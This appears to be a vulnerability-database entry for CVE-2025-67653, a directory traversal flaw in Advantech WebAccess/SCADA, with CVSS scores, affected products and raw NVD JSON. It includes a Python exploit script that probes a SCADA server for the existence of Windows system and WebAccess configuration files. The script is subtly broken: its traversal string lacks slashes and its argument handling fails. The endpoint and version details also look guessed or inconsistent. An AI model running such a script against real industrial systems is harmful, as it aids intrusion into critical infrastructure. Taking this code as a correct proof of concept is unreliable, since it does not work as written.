Security Vulnerability Report
中文
CVE-2025-67653 CVSS 4.3 MEDIUM

CVE-2025-67653

Published: 2025-12-18 21:15:58
Last Modified: 2025-12-31 19:24:48

Description

Advantech WebAccess/SCADA is vulnerable to directory traversal, which may allow an attacker to determine the existence of arbitrary files.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:advantech:webaccess\/scada:9.2.1:*:*:*:*:*:*:* - VULNERABLE
Advantech WebAccess/SCADA < 9.5.0
Advantech WebAccess/SCADA 8.4.1及更早版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-67653 PoC - Advantech WebAccess/SCADA Directory Traversal # This PoC demonstrates how an attacker can detect the existence of arbitrary files target_url = "http://target-server/ScadaMobileServer/" # Update target IP def check_file_exists(filepath): """Check if a file exists on the target server using directory traversal""" # Path traversal payload traversal = ".." * 10 + "/" payload = f"{traversal}{filepath}" params = { "file": payload } try: response = requests.get(target_url, params=params, timeout=10) # If file exists, server may respond with 200 or specific content # If file doesn't exist, server may respond with 404 or error if response.status_code == 200: return True elif response.status_code == 404: return False else: # Check response content for hints if "cannot be found" not in response.text.lower(): return True return False except requests.exceptions.RequestException: return None def main(): if len(sys.argv) > 1: target_url = sys.argv[1] # Test file paths to enumerate test_files = [ "C:\\Windows\\win.ini", "C:\\Windows\\System32\\drivers\\etc\\hosts", "C:\\Program Files\\Advantech\\WebAccess\\config.ini", "C:\\ProgramData\\Microsoft\\Windows\\UAC\\file.txt" ] print(f"[*] Testing CVE-2025-67653 on {target_url}") print("-" * 50) for file_path in test_files: result = check_file_exists(file_path) if result: print(f"[+] File EXISTS: {file_path}") elif result is False: print(f"[-] File NOT FOUND: {file_path}") else: print(f"[?] Could not determine: {file_path}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67653", "sourceIdentifier": "[email protected]", "published": "2025-12-18T21:15:57.807", "lastModified": "2025-12-31T19:24:48.497", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Advantech WebAccess/SCADA is vulnerable to directory traversal, which may allow an attacker to determine the existence of arbitrary files."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:advantech:webaccess\\/scada:9.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "211D6D3C-96AE-409D-A37B-FCF2A86D6DB9"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-352-06.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.advantech.com/en-us/support/details/installation?id=1-MS9MJV", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-352-06", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}